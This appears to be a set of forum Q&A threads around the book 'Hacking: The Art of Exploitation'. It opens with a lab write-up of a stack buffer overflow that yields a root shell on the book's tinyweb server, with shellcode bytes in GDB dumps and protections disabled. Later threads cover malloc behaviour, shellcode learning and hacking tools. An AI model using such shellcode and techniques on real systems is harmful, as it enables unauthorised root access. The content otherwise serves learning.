As promised earlier, here is the explanation along with the fix.

The exploit failed on my system (Ubuntu 10.10) because of the non-executable stack (note the RW flags, with no E, at the end of the GNU_STACK line):

$ gcc -fno-stack-protector -g -z noexecstack -o tinyweb ../code/tinyweb.c && readelf -l tinyweb | grep -i stack

GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

This resulted in the following GDB output.

Breakpoint 1, handle_connection (sockfd=4, client_addr_ptr=0xbfff1c94) at ../code/tinyweb.c:61
61      printf("Request %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr), ntohs(client_addr_ptr->sin_port), request);
(gdb) x/16xw request + 500
0xbfff1c54: 0x00d09d90  0xbfff1c90  0x0000000f  0x00000003
0xbfff1c64: 0x00268ff4  0xbfff1cc8  0x08048cec  0x00000004 
          Program's return address at 0xbfff1c6c---^
0xbfff1c74: 0xbfff1c94  0xbfff1c90  0xbfff1cb4  0x00000004
0xbfff1c84: 0x0804aff4  0xbfff1c98  0x08048658  0x00000010
(gdb) bt
#0  handle_connection (sockfd=4, client_addr_ptr=0xbfff1c94) at ../code/tinyweb.c:61
#1  0x08048cec in main () at ../code/tinyweb.c:49

(gdb) x/150x request
----Output Trimmed----
0xbfff1b70: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfff1b80: 0x90909090  0x90909090  0x90909090  0xdb31c031
0xbfff1b90: 0xb099c931  0x6a80cda4  0x6851580b  0x68732f2f
0xbfff1ba0: 0x69622f68  0x51e3896e  0x8953e289  0x9080cde1
0xbfff1bb0: 0x90909090  0x90909090  0x90909090  0x90909090
----Output Trimmed----
0xbfff1c40: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfff1c50: 0x90909090  0x00000000  0x90909090  0x00000211
0xbfff1c60: 0x90909090  0x90909090  0x90909090  0xbfff1b28 
                              Overwritten Return Address-^
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08048fff in handle_connection (sockfd=Cannot access memory at address 0x90909098
) at ../code/tinyweb.c:110
110 }
(gdb) c
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.

Although not shown, the return address now points to a valid memory location higher up on the stack. Here is the output from the web server:

Request 127.0.0.1:44576 "����������������������
�����������������������������������������������
�����������������������������������������������
�����������������������������������������������
�����������������������������������������������
�����������������������������������������������
��������������������������������������1�1�1ə��̀j

        Xqh//shh/bin��Q��S��̀�����������������������
    �����������������������������������������������
�����������������������������������������������
�����������������������������������������������
�##"

 NOT HTTP!

Shutting down socket.

Segmentation fault

As noted above, the exploit fails. After turning off stack-smashing protection and making the stack executable, though, it succeeds:

$ gcc -z execstack -fno-stack-protector -g -o tinyweb ../code/tinyweb.c && readelf -l tinyweb | grep -i stack
 GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x

Breakpoint 1, handle_connection (sockfd=13, client_addr_ptr=0xbf88b554) at ../code/tinyweb.c:61
61      printf("Request %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr), ntohs(client_addr_ptr->sin_port), request);
(gdb) c
Continuing.

Breakpoint 2, handle_connection (sockfd=13, client_addr_ptr=0xbf88b554) at ../code/tinyweb.c:109
109     shutdown(sockfd, SHUT_RDWR);
(gdb) c
Continuing.
process 13666 is executing new program: /bin/dash

And back to the web server output:

Request 127.0.0.1:52107 "������������������������
��������������������������������������������
��������������������������������������������
��������������������������������������������
���������������������������������������������
���������������������������������������������
���������������������������������������1�1�1ə��̀j

                                                                              Xqh//shh/bin��Q��S��̀���������
������������������������������������������������
������������������������������������������������
�����������������������������������������������
���������������������##"

NOT HTTP!

Shutting down socket.

# whoami

root

Success.

This is a contrived example set up specifically to play around with and learn how buffer overflows work, but the overall lesson about dealing with current protection measures is useful to know. While looking for an answer, I found this post, which does a good job of revisiting Smashing the Stack for Fun and Profit and explains the changes developers have made to make programs more difficult to exploit.

http://paulmakowski.wordpress.com/2011/01/25/smashing-the-stack-in-2011/

Hope this helps anyone who runs into the same issues down the road.

Consider these two C programs:

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    char* char_pointer;
    int* int_pointer;

    char_pointer = (char*)malloc(5);
    printf("location of char_pointer: %p\n", (void*)char_pointer);

    int_pointer = (int*)malloc(10);
    printf("location of int_pointer: %p\n", (void*)int_pointer);

    free(char_pointer);

    char_pointer = (char*)malloc(50);
    printf("location of char_pointer: %p\n", (void*)char_pointer);

    free(char_pointer);
    free(int_pointer);
    return 0;
}

and

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    char* char_pointer;
    int* int_pointer;

    char_pointer = (char*)malloc(200);
    printf("location of char_pointer: %p\n", (void*)char_pointer);

    int_pointer = (int*)malloc(10);
    printf("location of int_pointer: %p\n", (void*)int_pointer);

    free(char_pointer);

    char_pointer = (char*)malloc(50);
    printf("location of char_pointer: %p\n", (void*)char_pointer);

    free(char_pointer);
    free(int_pointer);
    return 0;
}

The outputs are:

location of char_pointer: 0x23eb010
location of int_pointer: 0x23eb030
location of char_pointer: 0x23eb050

and

location of char_pointer: 0x1815010
location of int_pointer: 0x18150e0
location of char_pointer: 0x1815010

As you can see, in the first program the allocator placed the new char_pointer after int_pointer (after freeing and reallocating), but in the second program it placed char_pointer in the freed memory at 0x1815010.

The only difference between programs is the amount of memory allocated and freed.

So, my questions are:

What does the choice of allocation address depend on? (OS, compiler, or hardware?)

Why does "it" decide to reuse the freed memory when the amount of allocated memory is "big"?

P.S. I have read about this issue in this book

It depends on a lot of factors, and there's no simple description to describe the behavior. Every C runtime library implements malloc() differently -- you can take a look at your CRT's source code if you're curious how it works under the hood.

Here are some commonly used malloc() implementations:

The rough way most memory allocators work is that they keep track of available memory regions. When a request comes in, they check whether they have an available region at least as big as the request; if so, they carve up that memory, update their internal data structures to record that it is now allocated, and return the corresponding pointer. If not enough free memory is available, the allocator asks the OS for more virtual address space (typically through sbrk(2), mmap(2), or VirtualAlloc).

So if a block is allocated and then freed, and another request of the same size (or smaller) comes in, the same or a nearby pointer is often (but not always) returned.

If the requested allocation is very large, the allocator may skip its internal block handling and satisfy the request directly from the OS: when allocating hundreds of KB or more, it's usually more efficient to mmap() or VirtualAlloc() that memory directly rather than search the list of internal free areas. Not all allocators do that, though, and the exact cutoff is often variable.

Do you know where I can find low-level Windows assembly example programs?

I have some examples using macros (NASM, MASM), but I want pure assembly so that I can build shellcode later.

Thanks a lot guys!

To learn to build shellcode, I would suggest writing a very simple C program that does what you want the shellcode to do and then disassembling it with IDA or Immunity (or whatever debugger/disassembler you are familiar with). Then you can see which instructions are being used.

I would also recommend the following books:

Hacking: The Art of Exploitation (2nd Edition)

The Shellcoder's Handbook

I'm very interested in learning about cryptography, steganography, and similar practices.

What books, resources, would you guys recommend in this area?

This book is very nice and gives you a general idea of cryptography; as far as I remember, it also gives some information about steganography (from ancient times): The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography. It is not an academic book, though.

For steganography you could check also the following two: Disappearing Cryptography, Third Edition: Information Hiding: Steganography & Watermarking or Digital Watermarking and Steganography: Fundamentals and Techniques. As you are a Java developer you may also want to take a look at the Digital Invisible Ink Toolkit.

If you want to go deep into cryptography (for example, the RSA algorithm), you should read math books on number theory and abstract algebra (for an introduction to these, see A Primer on Algebra and Number Theory for Computer Scientists, a PDF file). If you want to go much deeper, read about elliptic curve cryptography.

About hacking you may want to take a look at this one: Hacking: The Art of Exploitation.

This book The Art of Deception: Controlling the Human Element of Security is also nice to read in order to learn social engineering techniques.

I found this source in Jon Erickson's book, Hacking: The Art of Exploitation,

userid = getuid(); // get the real user ID
// Writing data
if(write(fd, &userid, 4) == -1)  // write user ID before note data
    fatal("in main() while writing userid to file");
write(fd, "\n", 1); // terminate line

I compiled this code and found that, in the file I write to, userid (which is what the code above writes) does not come out right; there are just some strange characters (I don't think it's important to reproduce them here). I think the problem is that an int is being passed to a function that requires a char *, and that is why the result in the file is wrong.

So this is a bug, right?

The write() function expects a void * for its buffer; it writes arbitrary binary data. If you need conversion to string, use printf().

You don't show the declaration of userid, but the write() line should be written as:

if (write(fd, &userid, sizeof(userid)) != sizeof(userid))

This will detect short writes (unlikely to be a problem for an integer type) and other problems, and works correctly regardless of the type of userid. The original version of the line is arguably buggy, therefore. Otherwise, the bug seems to be in your expectations rather than the code per se.

I guess there are similar questions and some data on the web, but I want to be sure that I grasp the concept correctly, since all the online tutorials are way too long and focus on exploits, etc. The way I see it, a simple buffer overflow works something like this:

//////////////////////////////////////////////////

  1. You send a string of arguments/input like this: NOP instructions (0x90) + shellcode + some text + the address of one of the NOP instructions.

  2. If the string has the correct length, it will overwrite the return address ebp with the address of one of the NOP instructions. Once execution jumps there, it slides along the NOPs until it reaches the shellcode... and the rest is history.

////////////////////////////////////////////////

I am more of a C++/PHP/C# type of guy, and assembly and C are beyond my mental capabilities... lol... so, seriously or jokingly, is the description above along the right lines? Also, as far as I understand, there are some protections against buffer overflows, though I don't understand them yet. How would a firewall catch this?

10x!

Smashing the Stack for Fun and Profit is a must-read for anybody who is serious about understanding how buffer overflows work. You will find no better answer than what that paper provides.

Edit

If you've already read Smashing the Stack and want to go further then may I suggest reading Hacking: The Art of Exploitation 2nd Ed

Hacking: The Art of Exploitation

I have recently learned the basics of buffer overflows, and I have written a few very simple pieces of C/C++ code with unsafe buffers and have produced some interesting results.

Now my question is this: Can you name a program that's actually out there in the wild that has a known buffer overflow vulnerability? I am especially looking for something that runs over a network, if possible.

I have seen tutorials, read articles, and even watched videos that talked about or demonstrated the buffer overflow vulnerability in Ability FTP Server ver. 2.34, but I cannot for the life of me find a single copy of it online anywhere. I can find plenty of downloads of non-vulnerable versions, but none of the educationally useful ones. Any help on this front would also be appreciated.

Thanks a bunch.

There is a great book that teaches exploiting buffer overflows (among other vulnerabilities). The book comes with a Linux LiveCD that is nicely set up with compilers/debuggers and plenty of exploitable programs.

Highly recommended if you haven't already picked it up:


Hacking: The Art of Exploitation

I cannot understand why a call to read() after an lseek() returns 0 bytes read.

//A function to find the next note for a given userID;
//returns -1 if the end of the file is reached;
//otherwise, it returns the length of the found note.
int find_user_note(int fd, int user_uid) {
    int note_uid = -1;
    unsigned char byte;
    int length;

    while(note_uid != user_uid) { // Loop until a note for user_uid is found.
        if(read(fd, &note_uid, 4) != 4) // Read the uid data.
            return -1; // If 4 bytes aren't read, return end of file code.
        if(read(fd, &byte, 1) != 1) // Read the newline separator.
            return -1;

        byte = length = 0;
        while(byte != '\n') { // Figure out how many bytes to the end of line.
            if(read(fd, &byte, 1) != 1) // Read a single byte.
                return -1; // If byte isn't read, return end of file code.

            //printf("%x ", byte);
            length++;
        }
    }
    long cur_position = lseek(fd, length * -1, SEEK_CUR ); // Rewind file reading by length bytes.

    printf("cur_position: %ld\n", cur_position);

    // this is debug
    byte = 0;
    int num_byte = read(fd, &byte, 1);

    printf("[DEBUG] found a %d byte note for user id %d\n", length, note_uid);
    return length;
}

The value of length is 34 when the outer while loop exits, and the code above prints cur_position 5 (so there are definitely at least 34 bytes after the position lseek() returns), but num_byte, the value returned by read(), is always 0 even though there are still bytes to read.

Does anyone know why num_byte is always 0? If it is a mistake in my code, I am not seeing it.

Just for information, the above code was run on the following machine:

$ uname -srvpio
Linux 3.2.0-24-generic #39-Ubuntu SMP Mon May 21 16:52:17 UTC 2012 x86_64 x86_64 GNU/Linux

Update:

  • I uploaded the full code here
  • This is the content of the file that I am trying to read:
$ sudo hexdump -C /var/notes
00000000  e8 03 00 00 0a 74 68 69  73 20 69 73 20 61 20 74  |.....this is a t|
00000010  65 73 74 20 6f 66 20 6d  75 6c 74 69 75 73 65 72  |est of multiuser|
00000020  20 6e 6f 74 65 73 0a                              | notes.|
00000027

$

I finally found the issue! I have to #include <unistd.h> in order to use the correct lseek(). However, I'm not sure why the code still compiled without unistd.h, only to behave unexpectedly. I thought that without the function's prototype it shouldn't even compile.

The code was written in Hacking: The Art of Exploitation 2nd Edition by Jon Erickson and I have verified that in the book, there is no #include <unistd.h>.

My line of code is as follows:

printf("test @ 0x%1$08x = %2$d 0x%2$08x\n", &test_val, test_val);

but instead of printing the variables it's printing

test @ 0x$08x = $d 0x$08x

It completely ignores the percent characters and does not print any of the variables. I can't find anything about this or any reason why it might happen; hopefully someone can help.

EDIT: I could not find a link, but basically, from my knowledge and from Hacking: The Art of Exploitation, the number after the percent character selects the parameter to use, so %n$d uses the nth parameter and prints it as a decimal. In this case, %1$08x should print &test_val in hexadecimal and %2$d should print test_val as a decimal.

OK, I just want to make one thing clear: I don't plan to use any hacking skills I pick up for anything malicious or illegal. Anyway...

I am quite good at HTML and CSS, relatively good at JavaScript and jQuery, have very basic knowledge of PHP, C and Java, and passing knowledge of SQL and Python.

I've been coding for a while now and have done a substantial amount, and now I want to move on to other areas, such as hacking.

I know of basic methods such as SQL injection and XSS, but am looking for someone to point me in the right direction (books, websites, other resources, etc.) to start.

I understand that a simple Google search throws up hundreds of options; however, I am looking for more structured, user-friendly, and applicable resources, and I would also like input from people experienced in hacking on how they got started, where to go from there, and any tips or advice.

Also as a side note, I am more interested in using hacking (eventually at least) practically, (but not maliciously, obviously) rather than theoretically, and I am not particularly interested in using it to improve security either.

Programming Languages

Knowledge of HTML, CSS, and jQuery will be of almost no benefit to a hacker, whereas knowledge of C/C++ and/or Python is probably essential. You'll also need to know assembly (ASM), as many remote exploits involve sending assembled machine code as part of the attack payload.

Networking

You need advanced knowledge of most aspects of networking, including the OSI model, ARP, how TCP and UDP work, and so on. Beyond that, you need to know how to create and use sockets in your programming language of choice.

Tools

Here is a list of some tools that are essential to most hackers. It is by no means comprehensive, but these are the most basic and powerful.

  • Kali Linux - One of the most useful: a Debian-based distribution with a GNOME 3 desktop that contains most of the main programs a hacker will use preinstalled, including most of the tools below.
  • nmap - A port scanner, in its most basic use.
  • ettercap - Used for anything related to ARP poisoning.
  • XSScrapy - Scans remote websites for XSS vulnerabilities (and basic SQL injection).
  • metasploit - Provides a large database of exploits, most of which can be launched against a target by entering a few simple commands.
  • nikto - Scans remote web servers for vulnerabilities.

Resources

And here are some other useful links:

Vulnerability Databases

Informational

Books

Hope this helped, good luck!